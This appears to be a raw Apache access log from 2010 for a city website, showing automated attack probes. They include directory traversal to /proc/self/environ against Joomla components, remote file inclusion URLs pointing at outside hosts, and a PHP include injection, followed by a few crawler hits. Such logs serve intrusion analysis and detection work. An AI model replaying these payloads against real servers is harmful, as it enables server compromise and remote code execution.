74.55.250.50 - - [02/Sep/2010:08:06:39 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:40 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:40 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:06:40 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:40 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:41 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:41 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:41 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:41 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:06:41 -0700] "GET /logs/access.log%20%20//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:08:07:17 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:08:07:18 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4084 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:08:07:19 -0700] "GET /logs/access_091231.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:22:38 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:22:38 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:22:38 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.133.130 - - [02/Sep/2010:08:22:39 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:24:31 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:24:31 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:24:32 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
174.123.161.226 - - [02/Sep/2010:08:24:32 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
205.251.131.112 - - [02/Sep/2010:08:24:44 -0700] "GET /logs/access_091201.log%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.251.131.112 - - [02/Sep/2010:08:24:45 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
205.251.131.112 - - [02/Sep/2010:08:24:45 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:27:04 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:27:05 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:27:05 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
74.55.250.50 - - [02/Sep/2010:08:27:05 -0700] "GET /logs/access.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "" "cityofarkadelphia.com"
205.251.131.112 - - [02/Sep/2010:08:27:28 -0700] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.1.61.28 - - [02/Sep/2010:08:27:52 -0700] "GET /logs/access_091201.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.1.61.28 - - [02/Sep/2010:08:27:55 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.1.61.28 - - [02/Sep/2010:08:27:55 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.1.61.28 - - [02/Sep/2010:08:34:06 -0700] "GET /logs/access_091201.log%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.157.185.7 - - [02/Sep/2010:08:38:32 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.157.185.7 - - [02/Sep/2010:08:38:32 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.157.185.7 - - [02/Sep/2010:08:38:32 -0700] "GET /logs/access_091201.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://iabcyuhak.com//bbs/thumb_imgX/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.38.150.61 - - [02/Sep/2010:08:39:52 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.38.150.61 - - [02/Sep/2010:08:39:52 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
78.38.150.61 - - [02/Sep/2010:08:39:52 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.125.126.82 - - [02/Sep/2010:08:46:44 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 4513232 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)" "cityofarkadelphia.com"
69.16.237.166 - - [02/Sep/2010:08:52:27 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:08:52:45 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
209.200.253.155 - - [02/Sep/2010:08:53:48 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.200.253.155 - - [02/Sep/2010:08:53:48 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.200.253.155 - - [02/Sep/2010:08:53:48 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:08:56:22 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:08:56:22 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 4084 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:08:56:23 -0700] "GET /logs/access_091231.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.200.253.155 - - [02/Sep/2010:09:05:12 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.200.253.155 - - [02/Sep/2010:09:05:12 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
209.200.253.155 - - [02/Sep/2010:09:05:12 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.39.186 - - [02/Sep/2010:09:07:19 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.39.186 - - [02/Sep/2010:09:07:19 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.39.186 - - [02/Sep/2010:09:07:19 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.39.186 - - [02/Sep/2010:09:08:22 -0700] "GET //components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.39.186 - - [02/Sep/2010:09:08:22 -0700] "GET /logs/access.log///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
74.55.39.186 - - [02/Sep/2010:09:08:22 -0700] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig.absolute.path=http://www.enustech.com//technote7/data/inj/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
69.16.237.166 - - [02/Sep/2010:09:14:19 -0700] "GET /logs/access_091201.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.237.166 - - [02/Sep/2010:09:14:19 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "cityofarkadelphia.com"
69.16.237.166 - - [02/Sep/2010:09:14:19 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:09:15:28 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:09:15:29 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:09:15:29 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
69.16.237.166 - - [02/Sep/2010:09:15:48 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rbmfm.com/.smileys/.log/107.gif? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.29.86.7 - - [02/Sep/2010:09:17:22 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
207.46.195.235 - - [02/Sep/2010:09:36:13 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.195.235 - - [02/Sep/2010:10:15:42 -0700] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.13.43 - - [02/Sep/2010:10:19:46 -0700] "GET /Downloads/ HTTP/1.1" 200 671 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
38.107.191.88 - - [02/Sep/2010:10:34:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "cityofarkadelphia.com"
38.107.191.89 - - [02/Sep/2010:10:34:54 -0700] "GET / HTTP/1.1" 200 917 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "cityofarkadelphia.com"